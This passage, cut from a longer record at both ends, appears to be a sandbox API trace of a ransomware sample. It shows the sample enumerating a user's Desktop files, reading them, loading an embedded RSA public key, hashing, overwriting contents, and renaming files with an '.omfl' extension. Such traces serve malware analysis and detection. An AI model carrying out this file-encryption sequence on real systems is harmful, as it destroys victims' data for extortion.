lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.815] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x13778, lpOverlapped=0x0) returned 1 [0131.816] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.816] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.816] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.816] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0131.817] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.817] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.817] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.817] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.817] GetLastError () returned 0x0 [0131.817] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.817] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0131.817] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.817] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.817] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.818] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.819] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x13778, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.819] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.819] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.819] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.819] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.819] CloseHandle (hObject=0x610) returned 1 [0131.821] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0131.821] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74fb288 [0131.821] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0c20 | out: hHeap=0x4970000) returned 1 [0131.821] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\FR5HPFQiDoOluSF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\fr5hpfqidoolusf.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\FR5HPFQiDoOluSF.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\fr5hpfqidoolusf.mkv.omfl")) returned 1 [0131.822] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.822] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.822] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.823] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0131.823] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b2f3d0, ftCreationTime.dwHighDateTime=0x1d5de2e, ftLastAccessTime.dwLowDateTime=0x8cd77b50, ftLastAccessTime.dwHighDateTime=0x1d5dfbe, ftLastWriteTime.dwLowDateTime=0x8cd77b50, ftLastWriteTime.dwHighDateTime=0x1d5dfbe, nFileSizeHigh=0x0, nFileSizeLow=0xc257, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hvBEWg2szb7Ch.mp3", cAlternateFileName="HVBEWG~1.MP3")) returned 1 [0131.824] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.824] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa6) returned 0x74bf8f0 [0131.824] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.824] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\hvBEWg2szb7Ch.mp3") returned=".mp3" [0131.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\hvBEWg2szb7Ch.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\hvbewg2szb7ch.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.824] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=49751) returned 1 [0131.824] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.827] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xc231, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.827] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.828] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.828] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xc257, lpOverlapped=0x0) returned 1 [0131.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.829] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0131.830] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.830] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.830] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.830] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.830] GetLastError () returned 0x0 [0131.830] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.830] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0131.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.830] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.830] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.830] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc260) returned 0xdd35410 [0131.831] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35280 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17238 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd352c8 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17250 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17280 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17298 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.831] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17280 | out: hHeap=0x4970000) returned 1 [0131.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17298 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17280 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf168 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17298 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17280 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0131.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.832] GetCurrentThreadId () returned 0x618 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2e110 [0131.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.833] GetCurrentThreadId () returned 0x618 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.833] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.833] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17280 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17298 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17268 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd172b0 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8c0 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.834] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.834] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17280 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17280 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.835] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, 